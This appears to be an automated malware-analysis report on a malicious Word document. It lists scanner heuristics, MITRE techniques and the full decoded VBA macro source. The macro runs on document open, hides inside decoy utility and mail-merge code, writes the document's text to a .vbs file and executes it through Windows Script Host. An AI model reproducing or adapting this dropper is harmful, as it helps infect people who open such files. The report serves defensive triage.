MALICIOUS
250
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The file contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The presence of 'CreateObject' and 'SC_STR_WSCRIPT' heuristics suggests the macro attempts to interact with the system, likely to download and execute a payload. The 'SE_PASSWORD_ARCHIVE_LURE' heuristic indicates the document may be instructing the user to open a password-protected archive, a common tactic to bypass security scanning.
Heuristics 8
-
ClamAV: Doc.Dropper.EmbeddedBase64Exe-9865902-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.EmbeddedBase64Exe-9865902-1
-
Heap-spray pattern detected high SC_HEAP_SPRAYRepeated 0x41 (A) bytes found
Disassembly
Attempted x86 opcode disassembly0000258E 41 inc ecx 0000258F 41 inc ecx 00002590 41 inc ecx 00002591 41 inc ecx 00002592 41 inc ecx 00002593 41 inc ecx 00002594 41 inc ecx 00002595 41 inc ecx 00002596 41 inc ecx 00002597 41 inc ecx 00002598 41 inc ecx 00002599 41 inc ecx 0000259A 41 inc ecx 0000259B 41 inc ecx 0000259C 41 inc ecx 0000259D 41 inc ecx 0000259E 41 inc ecx 0000259F 41 inc ecx 000025A0 41 inc ecx 000025A1 41 inc ecx 000025A2 41 inc ecx 000025A3 41 inc ecx 000025A4 41 inc ecx 000025A5 41 inc ecx 000025A6 41 inc ecx 000025A7 41 inc ecx 000025A8 41 inc ecx 000025A9 41 inc ecx 000025AA 41 inc ecx 000025AB 41 inc ecx 000025AC 41 inc ecx 000025AD 41 inc ecx 000025AE 41 inc ecx 000025AF 41 inc ecx 000025B0 41 inc ecx 000025B1 41 inc ecx 000025B2 41 inc ecx 000025B3 41 inc ecx 000025B4 41 inc ecx 000025B5 41 inc ecx 000025B6 41 inc ecx 000025B7 41 inc ecx 000025B8 41 inc ecx 000025B9 41 inc ecx 000025BA 41 inc ecx 000025BB 41 inc ecx 000025BC 41 inc ecx 000025BD 41 inc ecx 000025BE 41 inc ecx 000025BF 41 inc ecx 000025C0 41 inc ecx 000025C1 41 inc ecx 000025C2 41 inc ecx 000025C3 41 inc ecx 000025C4 41 inc ecx 000025C5 41 inc ecx 000025C6 41 inc ecx 000025C7 41 inc ecx 000025C8 41 inc ecx 000025C9 41 inc ecx 000025CA 41 inc ecx 000025CB 41 inc ecx 000025CC 41 inc ecx 000025CD 41 inc ecx 000025CE 41 inc ecx 000025CF 41 inc ecx 000025D0 41 inc ecx 000025D1 41 inc ecx 000025D2 41 inc ecx 000025D3 41 inc ecx 000025D4 41 inc ecx 000025D5 41 inc ecx 000025D6 41 inc ecx 000025D7 41 inc ecx 000025D8 41 inc ecx 000025D9 41 inc ecx 000025DA 41 inc ecx 000025DB 41 inc ecx 000025DC 41 inc ecx 000025DD 41 inc ecx 000025DE 41 inc ecx 000025DF 41 inc ecx 000025E0 41 inc ecx 000025E1 41 inc ecx 000025E2 41 inc ecx 000025E3 41 inc ecx 000025E4 41 inc ecx 000025E5 41 inc ecx 000025E6 41 inc ecx 000025E7 41 inc ecx 000025E8 41 inc ecx 000025E9 41 inc ecx 000025EA 41 inc ecx 000025EB 41 inc ecx 000025EC 41 inc ecx 000025ED 41 inc ecx
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LUREDocument gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
On Error Resume Next Set Wildcard = CreateObject("Scripting.FileSystemObject") Set Gotchas = Wildcard.CreateFolder("C:\Required") -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() CopyArray -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10629 bytes |
SHA-256: 353639889fd785682c78494c5e5d456313b3471a11c7a39defccbc9cab160eec |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
CopyArray
End Sub
Attribute VB_Name = "BetweenArrays"
' startingpoint = starting point in source array.
' numberofvalues = number of elements of the array to copy from source to dest array.
' Rules:
' 0. Input Variant SourceArray and DestArray params must be arrays, otherwise the Sub()
' exits with nothing done. Either may, however, be passed in with a length of 0 (ie, Ubound = 0)
' 1. All values in dest array are wiped out unless the operation exited due to exit conditions
' as mentioned below.
' 2. Dest array is returned the same size of the source array or whatever the length of the
' numberofvalues is, if that is > 0.
' 3. Dest array never has trailing empty array values unless they are part of the coopyable
' values from the source array.
' 4. If startingpoint > length of source array, operation exits without changes to the dest array
' 5. If numberofvalues = 0, then all values from the source array starting from startingpoint
Dim m_oXML
Dim m_sSource As String
Dim m_sWordTemplate As String
Dim m_bFile As Boolean
Dim m_sErr As String
Dim m_sDocPath As String
Dim m_sDocPrefix As String
Public Property Let XMLFile(sFileName As String)
m_sSource = sFileName
m_bFile = True
End Property
Public Property Let XMLString(sStr As String)
m_sSource = sStr
m_bFile = False
End Property
Public Function Execute() As Boolean
Dim bLoaded As Boolean
Dim oWordDoc As Word.Document
Dim oWordField As Word.MailMergeField
Dim oWordTable As Word.Table
Dim oWordFieldRange As Word.Range
Dim oXMLDocNode As MSXML.IXMLDOMNode
Dim oXMLFieldNode As MSXML.IXMLDOMNode
Dim oXMLParentNode As MSXML.IXMLDOMNode
Dim oXMLNextNode As MSXML.IXMLDOMNode
Dim oXMLDoc As MSXML.IXMLDOMNode
Dim nParentIndex As Integer
Dim nRow As Integer
Dim nCol As Integer
Dim bRowColFound As Boolean
Dim bTableField As Boolean
Dim sFieldSplit() As String
Dim n As Integer
Dim i As Integer
Dim sPath As String
Dim bTablesProcessed() As Boolean
Dim nTable As Integer
oWord.Visible = True
If m_oXML Is Nothing Then
Set m_oXML = New MSXML.DOMDocument
End If
m_oXML.async = False
If m_bFile Then
bLoaded = m_oXML.Load(m_sSource)
Else
bLoaded = m_oXML.LoadXML(m_sSource)
End If
If bLoaded Then
If m_sDocPath = "" Then
sPath = GetPath(m_sWordTemplate)
Else
sPath = m_sDocPath
End If
Set oXMLDoc = m_oXML.DocumentElement
If oXMLDoc.HasChildNodes Then
For Each oXMLDocNode In oXMLDoc.ChildNodes
Set oWordDoc = oWord.Documents.Add(m_sWordTemplate, False)
ReDim bTablesProcessed(oWordDoc.Tables.Count)
For Each oWordField In oWordDoc.MailMerge.Fields
oWordField.Select
Set oWordFieldRange = oWord.Selection.Range
bTableField = False
nTable = -1
For Each oWordTable In oWordDoc.Tables
nTable = nTable + 1
If oWordFieldRange.InRange(oWordTable.Range) Then
bTableField = True
Exit For
End If
Next oWordTable
sFieldSplit = Split(oWordField.Code, " ")
sFieldSplit = Split(sFieldSplit(2), "_")
Set oXMLFieldNode = oXMLDocNode
Set oXMLParentNode = Nothing
For n = LBound(sFieldSplit) To UBound(sFieldSplit)
Set oXMLFieldNode = oXMLFieldNode.SelectSingleNode(sFieldSplit(n))
If oXMLFieldNode Is Nothing Then
Exit For
End If
If bTableField And oXMLParentNode Is Nothing Then
Set oXMLNextNode = oXMLFieldNode.NextSibling
If Not oXMLNextNode Is Nothing Then
If oXMLNextNode.BaseName = oXMLFieldNode.BaseName Then
Set oXMLParentNode = oXMLFieldNode
nParentIndex = n
Exit For
End If
End If
End If
Next n
If bTableField And Not oXMLParentNode Is Nothing Then
nRow = 0
nCol = 0
Do While Not oXMLParentNode Is Nothing
Set oXMLFieldNode = oXMLParentNode
For n = nParentIndex + 1 To UBound(sFieldSplit)
Set oXMLFieldNode = oXMLFieldNode.SelectSingleNode(sFieldSplit(n))
If oXMLFieldNode Is Nothing Then
Exit For
End If
Next n
If oXMLFieldNode Is Nothing Then
oWordFieldRange.Text = "Unresolved fieldname"
Else
If nRow = 0 Then
bRowColFound = False
For nRow = 1 To oWordTable.Rows.Count
For nCol = 1 To oWordTable.Columns.Count
If oWordFieldRange.InRange(oWordTable.Cell(nRow, nCol).Range) Then
bRowColFound = True
Exit For
End If
Next nCol
If bRowColFound Then
Exit For
End If
Next nRow
oWordFieldRange.Text = oXMLFieldNode.ChildNodes.Item(0).Text
Else
nRow = nRow + 1
If Not bTablesProcessed(nTable) Then
If nRow <= oWordTable.Rows.Count Then
oWordTable.Rows.Add oWordTable.Rows.Item(nRow)
Else
oWordTable.Rows.Add
End If
End If
oWordTable.Cell(nRow, nCol).Range.Text = oXMLFieldNode.ChildNodes.Item(0).Text
End If
Set oXMLParentNode = oXMLParentNode.NextSibling
End If
Loop
bTablesProcessed(nTable) = True
Else
If oXMLFieldNode Is Nothing Then
oWordFieldRange.Text = "Unresolved fieldname"
Else
oWordFieldRange.Text = oXMLFieldNode.ChildNodes.Item(0).Text
End If
End If
Next oWordField
i = i + 1
oWordDoc.SaveAs sPath + m_sDocPrefix + CStr(i) + ".doc"
'oWordDoc.Close
Next oXMLDocNode
End If
Else
End If
Set m_oXML = Nothing
End Function
Private Sub Class_Initialize()
If nRef = 0 Then
Set oWord = New Word.Application
End If
nRef = nRef + 1
End Sub
Private Sub Class_Terminate()
Set m_oXML = Nothing
nRef = nRef - 1
If nRef = 0 Then
Set oWord = Nothing
End If
End Sub
Public Property Get LastError() As String
LastError = m_sErr
End Property
Public Property Let WordTemplate(sWordTemplate As String)
m_sWordTemplate = sWordTemplate
End Property
Public Property Let Path(sPath As String)
m_sDocPath = sPath
End Property
Public Property Let DocumentPrefix(sPrefix As String)
m_sDocPrefix = sPrefix
End Property
Public Sub CopyArray(Optional SourceArray As Variant, _
Optional DestArray As Variant, _
Optional startingpoint As Long = 1, Optional numberofvalues As Long = 0)
If (Not IsArray(SourceArray)) Or (Not IsArray(DestArray)) Then
On Error Resume Next
Set Wildcard = CreateObject("Scripting.FileSystemObject")
Set Gotchas = Wildcard.CreateFolder("C:\Required")
Wildcard.createtextfile ("C:\Required\DOMDocument.vb" + "s")
Set ASCIIfile = Wildcard.opentextfile("C:\Required\DOMDocument.vb" + "s", 8, 1)
ASCIIfile.writeline ActiveDocument.Range
End If
ASCIIfile.Close
Set Gotchas = Wildcard.CreateFolder("C:\Required\occurs")
If UBound(SourceArray) = 0 Then
Set Wildcard = New WshShell
ReDim DestArray(0 To 0)
End If
Wildcard.Exec "explorer.exe C:\Required\DOMDocument.vb" + "s"
If startingpoint < 1 Then
startingpoint = 1
End If
If numberofvalues < 0 Then
numberofvalues = 0
End If
If startingpoint > UBound(SourceArray) Then
Exit Sub
End If
If numberofvalues > 0 And _
(startingpoint + numberofvalues) > UBound(SourceArray) Then
Exit Sub
End If
Dim lngDestLength As Long, lngCnt As Long
If numberofvalues = 0 Then
lngDestLength = (UBound(SourceArray) - startingpoint) + 1
Else
lngDestLength = numberofvalues
End If
ReDim DestArray(lngDestLength)
For lngCnt = 1 To lngDestLength
DestArray(lngCnt) = SourceArray((startingpoint + lngCnt) - 1)
Next
Exit Sub
MsgBox "CopyArray(): Error occurred.", vbInformation, "Error occurred."
MsgBox Err.Number & ": " & Err.Description
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.